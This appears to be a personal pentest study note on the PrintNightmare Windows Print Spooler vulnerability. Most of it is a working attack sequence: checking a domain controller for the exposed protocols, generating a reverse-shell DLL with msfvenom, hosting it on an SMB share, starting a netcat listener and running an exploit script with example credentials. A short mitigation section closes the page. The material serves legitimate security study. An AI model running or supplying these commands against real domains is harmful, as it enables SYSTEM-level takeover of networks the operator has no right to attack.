// notes/ Active Directory
🏛️

Critical Active Directory CVEs Printnightmare

The PrintNightmare vulnerability has to do with a flaw found in the Windows Print Spooler service. The flaw being that the service allows users to add printers and devices AND run…

#active directory#adot8
source · oscp.adot8.com · active-directory/critical-active-directory-cves_printnightmare

PrintNightmare

Overview

The PrintNightmare vulnerability has to do with a flaw found in the Windows Print Spooler service. The flaw being that the service allows users to add printers and devices AND runs as system.

This is a Post-Compromised attack and only needs a regular user account

PrintNightmare Attack

Check if the Domain Controller is vulnerable

bash
$rpcdump.py @192.168.1.129 | egrep 'MS-RPRN|MS-PAR'

Desired Output

bash
$Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
$Protocol: [MS-RPRN]: Print System Remote Protocol

Generate malicious DLL, host it and start listener

bash
$msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=1337 -f dll > shell.dll
$smbserver.py share `pwd` -smb2support
$nc -lnvp 1337

Download and run this script.

bash
$python3 printnightmare.py pnpt.local/greg:Password1@192.168.1.129 '\\192.168.1.11\share\shell.dll'

{% embed url="https://github.com/JohnHammond/CVE-2021-34527/tree/master/nightmare-dll/nightmare" %}

code
01Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"

Mitigation

  • Run Stop-Service Spooler
    • REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f